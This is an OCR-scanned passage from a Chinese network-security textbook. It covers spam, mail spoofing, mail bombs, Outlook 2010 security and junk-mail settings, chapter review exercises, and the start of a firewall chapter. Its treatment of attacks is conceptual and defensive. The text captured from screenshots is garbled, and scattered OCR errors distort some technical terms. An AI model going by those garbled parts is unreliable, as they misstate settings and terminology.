址 掩盖 其 不 良 记 录 ， 最 终 还 是 要 驱使 用 户 去 特定 的 网 站 。 因 此 ， 一 些 服务 厂商 维护 有 垃圾 
邮件 发 送 者 常用 网 站 地 址 库 ， 能 够 基于 邮件 中 插入 的 站 点 地 址 阻 断 邮件 ， 如 博 威 特 公司 的 
梭 子 鱼 产品 。 

在 垃圾 邮件 巨大 利润 的 驱使 下 ， 不 法 分 子 会 不 断 使 用 更 新 的 手段 和 技术 来 达到 目的 ， 
污染 邮件 和 网 络 环境 。 研 究 人 员 和 网 络 服务 商 也 将 一 如 既往 地 研制 新 技术 ， 来 应 对 不 法 分 
子 的 挑战 ， 因 此 ， 与 垃圾 邮件 的 斗争 注定 是 一 场 持久 战 。 


6.3.2” 防 邮件 欺骗 


邮件 欺骗 一 般 通 过 伪造 发 信人 的 身份 (或 匿名 )， 发 送 一 些 带 有 强烈 诱惑 性 的 信息 ， 使 
接收 者 上 当 受 骗 。 这 些 邮 件 有 的 带 有 病毒 或 木马 程序 ， 有 些 欺 骗 引诱 接收 者 透露 有 关 账 
号 、 密 码 等 机 密 信息 ， 来 达到 目的 。 这 类 欺骗 只 要 用 户 提高 警惕 ， 一 般 危害 性 不 是 太 大 。 

SMTP 协议 缺乏 验证 能 力 ， 所 以 假冒 身份 进行 邮件 欺骗 并 非 难 事 ， 邮 件 服务 器 不 会 对 
发 信者 的 身份 做 任何 检查 ， 如 果 邮 件 服务 器 允许 25 端口 连接 ， 那 么 任何 一 个 人 都 可 能 连 
接 到 这 个 端口 伪造 身份 ， 发 送 邮件 。 邮 件 服务 器 很 难 找到 与 发 信者 有 关 的 真实 信息 ， 唯 一 
能 做 的 就 是 查看 系统 log 文件 ， 看 看 信件 是 从 哪个 他 发 出 的 。 

邮件 服务 器 一 般 也 只 在 接收 邮件 时 提示 输入 密码 信息 ， 发 送 邮件 时 不 需要 密码 验证 。 
目前 ， 一 些 邮 件 系统 服务 商 已 经 注意 到 这 点 ， 并 采取 相应 的 措施 在 发 信 时 也 需要 密码 检 
测 。 另 外 ， 为 了 防止 攻击 者 利用 自己 的 邮件 系统 进行 欺骗 ， 应 该 禁止 服务 器 的 邮件 转发 ， 
不 允许 匿名 发 送 邮件 。 但 匿名 转发 有 时 有 一 些 特殊 的 用 途 ， 因 此 在 实际 应 用 中 ， 应 该 视 具 
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体 情 况 而 定 。 


6.3.3 ”邮件 炸弹 


邮件 炸弹 (E-mail Bomb) 是 黑客 常用 的 攻击 手段 ， 攻 击 者 用 伪造 的 IP 地 址 和 电子 邮件 
地 址 ， 在 很 短 的 时 间 内 ， 向 同一 信箱 中 发 送 成 千 上 万 ， 甚 至 无 穷 多 次 内 容 相同 的 邮件 ， 从 
而 挤 满 邮箱 ， 把 正常 邮件 冲 掉 。 

邮件 炸弹 占用 大 量 的 空间 和 服务 器 资源 ， 系 统 无 法 正常 工作 。 有 时 会 导致 系统 的 log 
文件 变 得 很 大 ， 甚 至 有 可 能 溢出 文件 系统 ， 致 使 系统 面临 崩溃 的 威胁 。 而 且 大 量 的 邮件 会 
加 重 网 络 的 负担 。 

对 于 邮件 服务 器 来 说 ， 可 以 对 用 户 邮 箱 加 一 些 限制 ， 邮 箱 信件 上 限 ， 每 日 收取 信件 上 
限 等 。 如 限制 单个 邮箱 信件 的 上 限 为 1000 封 ， 每 个 邮箱 每 日 收取 信件 上 限 为 100 封 。 一 
且 用 户 邮箱 遭受 邮件 炸弹 攻击 ， 邮 箱 不 会 对 发 进来 的 邮件 照 单 全 收 ， 只 会 接收 前 100 封 ， 
而 且 是 在 邮箱 信件 不 满 1000 封 的 前 提 下 。 

另外 还 可 以 对 系统 中 用 户 发 送 邮件 行为 加 上 限制 ， 如 单 封 邮 件 并 发 上 限 、 每 日 发 送 上 
限 、 每 日 用 户 认证 次 数 等 。 这 些 限 制 可 以 有 效 避 免 系统 用 户 对 外 发 送 邮 件 炸 弹 。 


6.4 客户 端 安全 措施 


在 邮件 系统 的 客户 端 用 户 可 以 采取 一 些 安全 措施 ， 保 护 自己 的 计算 机 和 邮件 信息 。 本 
节 以 Outlook 为 例 ， 讲 述 邮 件 安全 防护 的 用 户 策略 。 

Outlook 包含 一 些 工 具 ， 有 助 于 防止 电子 邮件 欺骗 、 增 强 邮件 的 私密 性 、 防 止 非法 用 
户 对 计算 机 的 非 授权 访问 。 使 用 这 些 工 具 ， 用 户 能 够 安全 的 发 送 和 接收 邮件 ， 并 有 效 控制 
邮件 内 携带 的 病毒 和 恶意 代码 。 


6.4.1 信任 中 心 


Outlook 信任 中 心 是 Microsoft“ 可 信赖 计算 ”的 一 部 分 ， 可 信赖 计算 是 微软 提出 的 一 
个 长 期 的 、 依 靠 集体 协作 完成 的 计划 ， 它 可 以 为 每 个 人 带 来 更 安全 、 保 密 和 可 靠 的 计算 体 
验 。 信 任 中 心包 含 安全 设置 和 隐私 设置 ， 这 些 设置 有 助 于 计算 机 的 安全 。 


1. 基本 功能 


在 Microsoft Outlook 2010 中 ， 选 择 “ 文 件 ” 一 “选项 ”， 在 弹出 的 “选项 ”面板 
中 ， 选 择 “ 信 任 中 心 ” 选 项 卡 ， 选 择 “ 信 任 中 心 设置 ”， 打 开 “ 信 任 中 心 ” 对 话 框 ， 如 
图 6-8 所 示 。 信 任 中 心 提供 以 下 与 邮件 安全 相关 的 功能 : 

e@ ”受信 任 的 发 布 者 。 

@ DEP 设置 ， 对 是 否 启用 数据 执行 保护 进行 设置 。 

@ ”个 人 信息 选项 ， 包 括 是 否 连接 到 Office 搜索 更 新 内 容 ， 定 期 下 载 确定 系统 问题 的 

文件 ， 是 否 允 许 信 息 检 索 任 务 窗 格 ， 检 查 并 安全 新 服务 。 
@ ”电子 邮件 安全 性 ， 对 电子 邮件 的 加 密 和 数字 证 书 进行 设置 ， 还 可 以 设置 是 否 允 许 
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在 文件 夹 中 使 用 脚本 。 

e@ ”附件 处 理 ， 包 括 附件 安全 模式 ， 答 复 时 包含 更 改 ， 附 件 预 览 设置 。 

e@ ”自动 下 载 ， 用 户 可 以 控制 在 打开 的 HTML 电子 邮件 时 ， 是 否 自动 下 载 和 显示 
图 片 。 
宏 设 置 ， 默 认为 “为 有 数字 签名 的 宏 提供 通知 ， 禁 用 所 有 其 他 宏 ”。 
编程 访问 ， 当 其 他 程序 用 编程 方式 访问 通讯 簿 和 地 址 信息 ， 或 以 用 户 名 义 发 送 邮 
件 时 ， 是 否 向 用 户 发 出 可 疑 活 动 警告 ， 默 认为 “我 的 防 病毒 软件 处 于 非 活动 状态 
或 过 期 时 向 我 发 出 可 疑 活动 警告 (推荐 )”。 


受信 任 的 发 布 者 您 可 控制 在 打开 HTML 电子 部件 时 Outlook 是 否 皇 动 下 载 和 显示 图 片 。 加 
DEp 设置 华 上 电子 邮件 直 的 图 片 可 帮助 保护 您 的 隐私 。HTML 电子 部 件 中 的 图 片 可 要 求 Outlook 
en 从 菇 个 最 务 器 下 载 因 片 。 以 此 方式 与 外 部 耻 务 记 通 信 可 验证 对 于 发 件 人 你 的 电子 邮件 地 址 

了 是 有 效 的 ， 但 可 能 使 成 为 更 多 垃圾 归 件 的 目标 。 
人 团 在 HTML 电子 邮件 或 RSS 项 目 中 禁止 自动 下 载 图 片 D) 
下 加 允许 来 和 或 发 送 到 “垃圾 邮件 ”入 安全 发 件 人 和 安全 接收 人 列表 中 。 || 


[EE 定义 的 发 件 人 或 收 件 人 的 电子 邮件 中 的 下 载 (S) 


安 员 置 圆 允许 从 位 于 此 安全 区 域 的 网 站 下 载 : 受信 任 区 域 (P) 

贺 允许 RSS 项 目 中 的 下 载 (R) 

圆 允许 从 SharePoint 讨论 板 下 载 (B) 

贺 编辑 、 转 发 或 答复 电子 部 件 时 在 下 载 内 容 之 前 警告 我 (W) 


6-8 ”Microsoft Outlook 2010 信任 中 心 
2. 邮件 安全 性 


在 Outlook“ 信 任 中 心 ” 单 击 “ 电 子 邮 件 安全 性 ”选项 卡 ， 打 开 如 图 6-9 所 示 的 对 话 
框 。 用 户 可 以 对 发 送 的 邮件 进行 加 密 和 签名 设置 ， 对 于 邮件 的 加 密 ， 提 供 了 4 个 选项 ， 分 
别 是 : 

(1) 加 密 待 发 邮件 的 内 容 和 附件 。 

(2) 给 待 发 邮件 添加 数字 签名 。 

(3) 以 明文 签名 发 送 邮 件 。 

(4) 对 所 有 S/MIME 签名 邮件 要 求 S/MIME 回执 。 

数字 标识 (证 书 ) 可 以 从 发 证 机 构 获 得 ， 发 证 机 构 除 了 负责 发 布 数字 标识 外 ， 还 提供 验 
证 数字 标识 的 有 效 性 服务 。VeriSign 公司 是 第 一 个 商业 发 证 机 构 ， 是 Microsoft 首选 的 数 
字 标 识 提 供 商 。 通 过 VeriSign 的 特殊 指定 ， 用 户 可 以 登录 office.com 获得 一 个 个 人 数字 标 
识 。 当 用 户 发 送 电子 邮件 时 ， 数 字 标 识 可 以 对 用 户 的 身份 进行 有 效 证 明 。 

在 图 6-9 中 的 “数字 标识 (证 书 )” 区 域 ， 可 以 对 用 户 的 数字 标识 进行 设置 : 

(1) 如 果 还 没有 数字 标识 ， 单 击 “ 获 取 数 字 标识 ”按钮 ， 登 录 office.com 获取 个 人 
证 书 。 

(2) 如 果 已 有 证 书 文件 ， 单 击 “ 导 入 /导出 ”按钮 导入 用 户 的 个 人 证 书 。 
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过 信任 的 装 布 寺 
DEp 讼 本 
个 人 信息 运 项 


训 客 电子 部 件 
中 目 加 车 竺 发 邮件 的 内 容 和 附件 四 
园 洽 每 发 者 件 活 加 笋 字符 名 (D) 
国 以 明文 竺 名 发 送 部 件 (D 
| aid 目 对 所 有 S/MIME 答 各 站 付 要 条 S/MIME 目 执 人 
Ga RD: 加 
去 设 秆 Ed 
坊 本 访问 数 了 标识 证书 ) 
数 闻 标识 观 证 书 呈 一 种 可 让 怎 在 电子 雇 务 中 证 实 身 份 的 文 栏 。 
RiRG- 
读 到 为 纯 文 本 
国 以 e 文 直属 式 记 取 所 有 标准 部 件 (A) 
本 二 疲 所 有 数字 生 并 伯 (ND 


文件 严 中 的 妥 本 


辐 放下 共享 文件 夫 中 使 用 基本 由 
加 元 在 公用 文件 到 中 使 用 中 本 旧 


Cm [wm | 
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3. 签名 单 封 邮件 


通常 ， 用 户 并 不 会 加 密 和 签名 所 有 发 送 的 邮件 ， 只 是 在 需要 时 ， 才 对 特殊 的 邮件 进行 
加 密 和 签名 。 因 此 ， 在 编辑 邮件 时 ，Outlook 提供 了 数字 签名 功能 。 

单 击 “ 新 建 电子 邮件 ”， 打 开 邮 件 编辑 窗口 ， 选 择 “文件 ”一 “信息 ”一 “属性 ”， 
在 打开 的 “属性 ”对 话 框 的 “安全 性 ”区 域 单 击 “ 安 全 设置 (T)”， 打 开 “ 安 全 属性 ”对 
话 框 ， 如 图 6-10 所 示 。 


EF 
团 加 密 邮 件 内 容 和 附件 Z) 
园 为 此 邮件 添加 救 字 答 名 四 ) 
辕 以 明文 答 名 发 送 邮 件 加 ) 
] 要 求 此 邮件 的 S/WINE 回执 玉 ) 
安全 设置 
安全 设置 5) 


[BN (RR 


图 6-10 “安全 属性 ”对 话 框 


安全 属性 提供 对 该 邮件 内 容 和 附件 进行 加 密 的 功能 ， 提 供 为 该 邮件 添加 数字 签名 的 
功能 。 

Onutlook 还 提供 了 密 件 抄 送 功能 ， 在 “选项 ”选项 卡 中 单 击 “ 密 件 抄 送 ”， 在 邮件 头 
部 将 显示 “ 密 件 抄 送 ”字段 。 邮 件 发 出 后 ， 其 他 的 收 件 人 看 不 到 “ 密 件 抄 送 ”字段 中 的 收 
件 人 信息 。 


第 6 章 电子 邮件 安全 215 


6.4.2 ” 拒 收 垃圾 邮件 


在 Outlook 中 嵌入 了 反 垃 圾 邮件 的 处 理 ， 使 用 户 可 将 广告 、 病 毒 等 垃圾 邮件 拒 之 门 
外 。 在 “开始 ”选项 卡 的 “删除 ”区 域 ， 选 择 “ 垃 圾 邮件 ”一 “垃圾 邮件 选项 (0)”， 弹 
出 如 图 6-11 所 示 的 对 话 框 ， 其 中 包含 5 个 选项 卡 。 


垃圾 部 件 远 项 - shuimoshanshui@sohu.com > 


党 大 | 安全 发 件 人 ] 安全 收 件 人 | 疼 止 发 件 人 | 国际 
部 号 = mWTREHHGMHM 的 “ia " 广 
选择 垃圾 出 件 保护 级别 - 
上 发 件 人 9 人 信和 动 到 “地 
低 : 将 最 明显 的 垃 专 邮 件 移动 到 “ 垃 坝 邮件 ”文件 来 


到 和 Paul。 
BE LO 


pt， 而 不 是 插 其 移动 到 “垃圾 邮件 ” 


回 禁 用 网 络 仿冒 邮件 中 的 树 接 和 其 他 功能 0)。 (推荐 ) 
对 电子 邮件 地 址 中 的 可 颖 域名 发 出 警告 9) 人 推荐 ) 


ER [ EA 


图 6-11 “垃圾 邮件 选项 ”对 话 框 

1. 选项 

Outlook 内 婴 垃 圾 邮件 识别 机 制 ， 并 根据 用 户 的 设置 ， 将 疑似 的 垃圾 邮件 移动 到 “ 垃 
圾 邮件 ”文件 夹 。 在 “选项 ”中 ， 用 户 可 以 选择 识别 垃圾 邮件 的 级 别 ， 包 括 以 下 4 个 
级 别 : 

(1) 不 自动 筛选 ……: 只 过 滤 “ 阻 止 发 件 人 ”的 邮件 ， 对 其 他 邮件 不 采取 过 滤 措 施 。 

(2) 低 : 将 最 明显 的 垃圾 邮件 移动 到 “垃圾 邮件 ”文件 夹 。 过 滤 特 征明 显 的 垃圾 邮 
件 ， 漏 判 率 高 ， 但 会 减少 误 判 率 。 

(3) 高 :能 捕捉 绝 大 多 数 垃圾 邮件 ， 但 也 可 能 捕捉 一 些 常规 邮件 。 请 经 常 检查 “垃圾 
邮件 ”文件 夹 。 

(4) 仅 安全 列表 : 只 有 来 自 “安全 发 件 人 ”或 “安全 收 件 人 ”列表 中 的 人 员 或 域 的 邮 
件 可 传递 到 您 的 收 件 箱 。 该 级 别 安全 性 最 高 ， 但 会 拒 收 大 部 分 邮件 ， 只 在 特殊 场合 使 用 。 

另外 还 有 三 个 复 选 框 ， 如 永久 性 删除 可 疑 的 垃圾 邮件 ……、 对 …… 可 疑 域名 发 出 警 
告 等 。 


2. 安全 发 件 人 


可 以 将 自己 信任 的 发 件 人 ， 添 加 到 安全 发 件 人 列表 中 ， 也 可 以 从 文件 导入 。 来 自 “ 安 
全 发 件 人 ”列表 中 的 地 址 或 域名 的 电子 邮件 不 会 被 视 为 垃圾 邮件 。 
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3. 安全 收 件 人 
和 “安全 发 件 人 ”一 样 ， 列 表 中 的 地 址 和 域名 的 电子 邮件 不 会 被 过 滤 掉 。 
4. 阻止 发 件 人 


类 似 于 “ 黑 名 单 ”， 来 自 “ 阻 止 发 件 人 ”列表 中 的 地 址 和 域名 的 邮件 会 被 视 为 垃圾 邮 
件 ， 可 以 通过 快捷 方式 添加 “阻止 发 件 人 ”。 选 中 垃圾 邮件 ， 选 择 “ 开 始 ” 一 “垃圾 邮 
件 ” 一 “阻止 发 件 人 (B)”， 则 该 发 件 人 被 添加 到 “阻止 发 件 人 ”列表 中 。 


5. 国际 
有 时 用 户 会 收 到 一 些 不 熟悉 的 邮件 ， 或 者 不 熟悉 语言 的 邮件 ， 可 以 将 其 标记 为 垃圾 邮 


件 。 在 此 提供 了 “阻止 的 顶级 域名 列表 ”和 “阻止 的 编码 列表 ”。 通 过 这 两 个 列表 可 以 将 
不 熟悉 的 垃圾 邮件 拒 之 门 外 。 


6.5 本 章 小 结 


本 章 由 浅 入 深 地 介绍 了 电子 邮件 的 安全 问题 。 首 先 介绍 了 邮件 系统 的 组 成 和 工作 方 
式 ， 叙 述 了 邮件 传送 的 过 程 。 接 着 分 析 了 邮件 协议 的 安全 性 和 安全 协议 ， 重 点 介绍 了 PGP 
和 S/MIME 安全 协议 。 对 于 邮件 系统 的 安全 机 制 ， 介 绍 了 垃圾 邮件 、 邮 件 炸 弹 和 邮件 欺 
骗 ， 重 点 叙述 了 垃圾 邮件 的 防护 技术 。 最 后 介绍 了 客户 端的 安全 措施 ， 包 括 安全 选项 和 垃 
圾 邮件 防护 配置 。 


6.6 课 后 习题 


1. 填空 题 
(1) 电子 邮件 又 叫 电子 信箱 ， 它 是 一 种 用 电子 手段 提供 的 通信 方式 。 
(2) TCP/IP 的 电子 邮件 系统 分 为 和 两 个 部 分 。 
(3) SMTP 协议 使 用 TCP 端口 建立 连接 ，IMAP 协议 使 用 端口 建立 
连接 。 
(4) PGP 提供 了 5 种 服务 : 5 、 、 和 
2. 选择 题 
(1) 电子 邮件 系统 采用 C/S 架构 ，ISO/OSI 的 电子 邮件 系统 模型 叫做 (  )。 
A. PGP B. MIME C. MTA D. MOTIS 
(2) TCP/IP 邮件 系统 采用 (  ”) 技 术 解 决 延迟 传递 问题 。 
A. 存储 转发 B. 握手 C. 缓冲 技术 D. 滑动 窗口 


(3) PGP 使 用 的 加 密 算法 有 (  ”)。 
A. IDEA B. 3DES C. CAST-128 DRSA EE.SHA 
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3. 判断 题 

(1) 电子 邮件 可 以 以 声音 方式 传送 信息 。 

(2) 电子 邮件 系统 是 一 种 “终端 到 终端 ”的 服务 。 
(3) IMAP 协议 允许 多 个 用 户 同时 访问 邮箱 。 

4. 简 答题 


(1) 要 保障 电子 邮件 系统 的 安全 ， 应 该 从 哪 几 方面 考虑 ? 
(2) 简 述 PGP 协议 发 送 邮件 的 过 程 。 

(3) PEM 中 包含 的 数据 类 型 有 哪 几 种 ? 

(4) 垃圾 邮件 的 防护 技术 有 哪些 ? 


5. 操作 题 


(1) 在 Outlook 2010 建立 一 个 邮件 账号 ， 完 成 下 列 任务 : 
对 发 送 的 所 有 邮件 的 正文 和 附件 进行 加 密 ; 

取消 附件 预览 ; 

取消 HTML 邮件 的 自动 下 载 图 片 功能 。 

(2) 进行 拒 收 垃圾 邮件 设置 : 

在 安全 发 件 人 中 增加 5 个 熟悉 的 发 件 人 地 址 ; 

拒 收 顶级 域名 为 VN 和 Pp 的 邮件 。 
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防火 墙 技术 是 现代 网 络 通信 和 计算 机 安全 防护 体系 中 的 一 种 重 
要 设备 ， 它 通常 位 于 两 个 或 多 个 网 络 的 边界 处 ， 是 实施 网 络 之 间 互 
连 访问 控制 的 一 种 组 件 集合 。 早 期 的 防火 墙 通常 是 基于 访问 控制 的 
包 过 滤 技 术 构建 的 ， 随 着 网 络 安全 威胁 的 日 益 增 加 和 网 络 技术 的 发 
展 ， 当 今 的 防火 墙 技术 也 得 到 了 极 大 地 发 展 ， 出 现 了 很 多 新 的 防火 
墙 技 术 ， 如 电路 级 网 关 技 术 、 状 态 检 测 技术 、 应 用 网 关 技 术 
式 防火 墙 技术 、 谋 入 式 防火 墙 技术 等 ， 它 们 有 的 工作 在 
型 的 网 络 层 ， 有 的 工作 在 传输 层 ， 还 有 的 工作 在 / 
署 上 ， 现 代 防 火 墙 也 已 经 不 再 是 一 个 单 兵 作战 的 系统 了 ， 
墙 都 与 入 侵 检 测 系 统 、 安 全 审计 系统 、 身 份 识别 系统 实现 
动 ， 从 而 形成 了 一 个 整体 的 安全 解决 方案 。 
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7.1 防火 墙 概述 


网 络 安全 中 的 防火 墙 一 词 借鉴 了 古代 防火 墙 的 喻 义 ， 在 古代 普遍 采用 木质 结构 房屋 的 
时 候 ， 极 易 发 生火 灾 ， 为 了 防止 火灾 的 发 生 和 草 延 ， 人 们 用 坚固 的 石 块 堆砌 在 房屋 的 周转 
作为 一 种 防火 的 屏障 ， 人 们 将 这 种 建筑 的 防火 设置 称 为 “防火 墙 ”。 而 网 络 安全 中 的 防火 
墙 通常 也 是 用 于 隔离 本 地 网 络 与 外 界 网 络 间 不 安全 通信 的 一 种 防御 屏障 ， 目 的 是 保护 本 地 
网 络 不 被 外 部 网 络 攻击 。 


7.1.1 防火 墙 的 定义 和 安全 要 素 


防火 墙 英文 名 称 为 Firewall， 是 一 种 设置 在 不 同 网 络 或 网 络 安全 域 之 间 的 设备 或 软 
件 ， 它 能 根据 用 户 的 安全 策略 允许 和 限制 出 入 安全 区 域 的 信息 传输 流 ， 且 本 身 必 须 具 有 较 
强 的 抗 攻 击 能 力 ， 由 于 它 是 不 同 网 络 或 网 络 安全 域 之 间 信息 流通 的 唯一 出 入 口 ， 因 此 也 是 
构建 用 户 信息 安全 服务 ， 实 现 网 络 和 信息 安全 的 一 种 基础 设施 和 安全 屏障 ， 如 图 7-1 
所 示 。 


安全 策略 


图 7-1 防火 墙 基本 架构 示意 图 


随 着 网 络 技术 的 不 断 发 展 以 及 互联 网 结构 的 复杂 化 ， 网 络 即 网 络 域 边界 安全 成 为 最 重 
要 的 安全 问题 之 一 ， 需 要 对 其 进行 有 效 的 管理 和 安全 控制 ， 主 要 可 体现 在 以 下 几 个 方面 。 

1) 网络 隔离 需求 

主要 是 指 能 够 根据 安全 策略 中 保护 级 别 的 要 求 对 网 络 区 域 进行 安全 域 分 割 ， 对 不 同 区 
域 之 间 的 流量 进行 控制 ， 通 过 对 数据 包 的 源 地 址 、 目 的 地 址 、 源 端口 、 目 的 端口 、 网 络 协 
议 等 参数 ， 实 现 对 网 络 流量 的 精细 控制 ， 把 可 能 的 安全 风险 控制 在 相对 独立 的 区 域内 ， 避 
免 安 全 风险 的 大 规模 扩散 。 这 就 要 求 流 经 两 个 或 多 个 网 络 域 边界 的 所 有 通信 数据 流 都 必须 
经 过 防火 墙 的 过 滤 。 根 据 美 国 国家 安全 局 制定 的 《信息 保障 技术 框架 》， 防 火 墙 适用 于 用 
户 网 络 系统 的 边界 ， 属 于 用 户 网 络 边界 的 安全 保护 设备 。 所 谓 网 络 边界 即 是 采用 不 同安 全 
策略 的 两 个 网 络 或 网 络 域 的 连接 处 ， 比 如 用 户 网 络 和 互联 网 之 间 的 连接 、 用 户 计 算 机 和 用 
户 网 络 之 间 的 连接 、 用 户 内 部 网 络 不 同 部 门 之 间 的 连接 等 。 图 7-2 给 出 了 防火 墙 的 一 种 典 
型 部 署 方式 ， 从 中 可 以 看 出 ， 防 火 墙 的 目的 就 是 在 网 络 连接 之 间 建 立 一 个 安全 控制 点 ， 通 
过 允许、 拒绝 或 重新 定向 ， 经 过 防火 墙 的 数据 流 ， 实 现 对 进 、 出 内 部 网 络 服务 和 访问 的 审 
计 和 控制 。 
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防火 培 管理 器 
7-2 ”防火 墙 的 典型 部 署 方式 


2) ”攻击 防范 能 力 

由 于 历史 原因 和 TCP/IP 协议 的 开放 特性 ，IPv4 协议 缺少 对 安全 特性 的 足够 考虑 ， 因 
此 给 当今 网 络 带 来 了 很 大 的 安全 风险 。 利 用 协议 缺陷 的 网 络 攻击 手段 层出不穷 ， 典 型 的 有 
IP 地 址 窃取 、 卫 地 址 欺骗 、 会 话 动 持 、 网 络 端 口 扫 描 以 及 危害 非常 大 的 拒绝 服务 攻击 
DoS 和 分 布 式 拒绝 服务 攻击 DDoS， 因 此 防火 墙 必须 有 足够 的 能 力 为 用 户 网 络 提供 有 效 的 
检测 和 防范 措施 。 图 7-3 给 出 了 某 小 型 网 络 遭 受 DDoS 攻击 时 的 流量 监测 图 ， 从 图 中 可 以 
看 出 ，DDoS 攻击 流量 高 达 60~70Mbps， 是 平时 正常 流量 的 十 几 倍 。 


Traffic Sraph CInbound, 4 hours) 
TT TT -一 


Ms jer conc 


Ezipo E3500 02001060 
Intermet Ircoming tassed 


图 7-3 ”DDoS 攻击 流量 监测 图 


除 此 之 外 ， 防 火 墙 自身 也 应 具有 非常 强 的 抗 攻击 力 ， 这 是 防火 墙 担当 网 络 安全 防护 重 
任 的 先决 条 件 。 防 火 墙 处 于 网 络 域 边界 ， 每 时 每 刻 都 要 面 对 黑客 和 病毒 的 入 侵 ， 这 样 就 要 
求 防火 墙 自身 要 具有 非常 强 的 抗 攻 击 能 力 。 

3) ”病毒 抵御 能 力 

当今 互联 网 中 随 着 蠕虫 王 、 冲 击 波 、 麦 托 、 尼 姆 达 、 震 荡 波 和 高 波 等 网 络 蠕虫 病毒 的 
渗透 、 后 门 木马 、 垃 圾 邮件 ， 特 别 是 新 一 代 蠕虫 病毒 的 不 断 侵袭， 严重 影响 了 用 户 网 络 的 
正常 运行 ， 甚 至 威胁 了 一 些 企业 的 核心 机 密 和 生存 。 如 何在 网 络 边界 识别 和 处 理 病毒 ， 抵 
御 未 知 病毒 、 降 低 网 络 风险 也 成 了 目前 防火 墙 技术 实现 中 的 一 项 关键 因素 。 
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4) 用户 管 理 需求 

对 于 接 入 局 域 网 、 广 域 网 或 者 Intemet 的 内 网 用 户 ， 防 火 墙 有 时 还 需要 对 他 们 的 网 络 
应 用 行为 进行 管理 ， 包 括 进 行 身份 认证 、 对 访问 资源 的 限制 和 对 网 络 访问 行为 的 控制 等 。 

5) ”具有 高 吞吐 量 、 低 延 时 的 快速 转发 需求 

由 于 防火 墙 处 于 网 络 域 的 边界 ， 同 时 要 对 经 过 防火 墙 的 所 有 通信 进行 检测 和 过 滤 ， 因 

此 常常 会 成 为 一 个 网 络 的 瓶颈 ， 因 此 防火 墙 应 具有 较 高 的 吞吐 量 和 低 延 时 的 快速 转发 能 

力 ， 尽 量 减 少 对 网 络 正常 通信 的 影响 ， 要 达到 此 目的 ， 就 要 求 防火 墙 的 软 硬 件 设计 都 要 尽 
量 达到 最 优 设计 。 

6) ”网 络 优化 需求 

对 于 用 户 应 用 网 络 ， 当 今 大 多 数 防火 墙 都 提供 了 灵活 的 流量 管理 功能 ， 用 于 保证 关键 
用 户 和 关键 应 用 的 网 络 带宽 ， 同 时 也 提供 了 完善 的 QoS 机 制 ， 保 证 数据 传输 的 质量 。 另 
外 ， 一 些 多 层 协 议 防 火 墙 ， 特 别 是 基于 七 层 框架 的 防火 墙 能 够 对 一 些 常见 的 高 层 协议 ， 提 
供 细 粒 度 的 控制 和 过 滤 能 力 ， 比 如 支持 WEB 和 EMAIL 过 滤 ， 支 持 P2P 识别 并 限 流 的 
能 力 。 

7) 网 络 可 视 化 监控 

网 络 流量 的 统计 、 实 时 流量 的 监控 、 系 统 漏洞 检测 和 网 络 流量 应 用 管理 等 功能 ， 是 网 
络 管理 的 基础 。 如 果 防 火 墙 可 以 支持 图 形 化 界面 和 直观 全 面 地 展现 各 种 统计 信息 ， 就 能 够 
帮助 管理 人 员 掌 握 网 络 状况 ， 增 强 网 络 的 风险 防范 能 力 。 

其 中 ， 安 全 、 管 理 和 速度 尤为 重要 ， 也 是 构成 防火 墙 系统 的 三 大 要 素 。 从 总 体 上 看 ， 
防火 墙 应 具有 以 下 五 大 基本 功能 : 

e@ ”过 滤 进 、 出 网 络 的 数据 。 

e 控制 进 、 出 网 络 的 访问 行为 。 

e@ 。 封 堵 某 些 禁止 的 业务 。 

e@ ”记录 通过 防火 墙 的 信息 内 容 和 活动 ， 并 对 日 志 进 行 分 析 。 

e@ ”对 网 络 攻击 行为 进行 检测 和 报警 。 

为 实现 以 上 功能 ， 在 防火 墙 产品 的 开发 中 ， 广 泛 应 用 了 网 络 拓扑 发 现 技术 、 操 作 系 统 
内 核 技术 、 路 由 技术 、 加 密 技 术 、 访 问 控制 技术 和 安全 审计 技术 等 。 


7.1.2 ”防火 墙 技术 的 发 展 历程 和 未 来 趋势 


防火 墙 的 发 展 从 采用 的 基本 技术 上 讲 大 致 经 历 了 5 个 阶段 。 

1) 第 一 代 防 火 墙 ， 包 过 滤 技 术 

第 一 代 防 火 墙 出 现 于 上 个 世纪 80 年 代 ， 它 几乎 与 路 由 器 同时 出 现 ， 主 要 基于 包 过 滤 
的 技术 ， 是 一 种 依附 于 路 由 器 包 过 滤 功 能 实现 的 防火 墙 ， 但 随 着 网 络 安全 的 重要 性 和 对 性 
能 要 求 的 提高 ， 防 火 墙 逐渐 发 展 成 为 一 个 具有 独立 结构 的 专用 设备 。 第 一 代 防 火 墙 主要 工 
作 在 网 络 层 ， 它 通过 对 数据 包 的 源 和 目的 IP 地 址 进行 识别 和 控制 ， 以 达到 数据 包 过 滤 的 
目的 ， 对 于 传输 层 ， 第 一 代 防 火 墙 只 能 识别 数据 包 是 使 用 的 TCP 还 是 UDP 协议 以 及 所 用 
的 端口 信息 ， 如 图 7-4 所 示 。 
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7-4 包 过 滤 防火 墙 基本 架构 示意 图 


由 于 只 对 数据 包 进行 解析 、 匹 配 和 重 装 ， 因 此 第 一 代 防 火 墙 的 处 理 速度 比较 快 ， 且 易 
于 配置 ， 但 应 用 包 过 滤 技 术 的 前 提 是 必须 明确 哪些 是 可 信 网 络 ， 哪 些 是 不 可 信 网 络 ， 随 着 
远程 办 公 等 新 业务 的 出 现 ， 模 糊 了 可 信 网 络 与 不 可 信 网 络 的 界限 ， 对 于 黑客 来 说 ， 只 要 获 
取 或 伪造 可 信 网 络 的 IP 地 址 ， 就 可 以 轻松 通过 包 过 滤 防 火 墙 进入 用 户 的 内 网 ， 而 这 又 是 
一 件 非 常 容易 的 事情 ， 另 外 ， 包 过 滤 防 火 墙 最 高 只 能 解析 到 传输 层 ， 对 于 应 用 层 协 议 其 访 
问 控 制 的 粒度 就 过 于 粗糙 了 ; 并 且 由 于 包 过 滤 防 火 墙 不 能 跟踪 数据 包 的 连接 状态 ， 因 此 可 
以 通过 应 答 包 的 方式 传统 防火 墙 ， 仍 可 以 达到 从 外 部 网 络 攻 击 内 网 的 目的 。 

2) 第 二 代 防 火 墙 ， 电路 层 防火 墙 

由 于 第 一 代 包 过 滤 防 火 墙 的 技术 缺陷 ，1989 年 ， 贝 尔 实验 室 的 Dave Presotto 和 
Howard Trickey 提出 了 第 二 代 防 火 墙 即 电路 层 防 火 墙 的 概念 和 产品 方案 ， 电 路 层 防火 墙 采 
用 了 一 种 完全 不 同 于 包 过 滤 技 术 的 实现 方式 ， 它 主要 工作 在 OSI 七 层 模型 的 会 话 层 ， 仅 依 
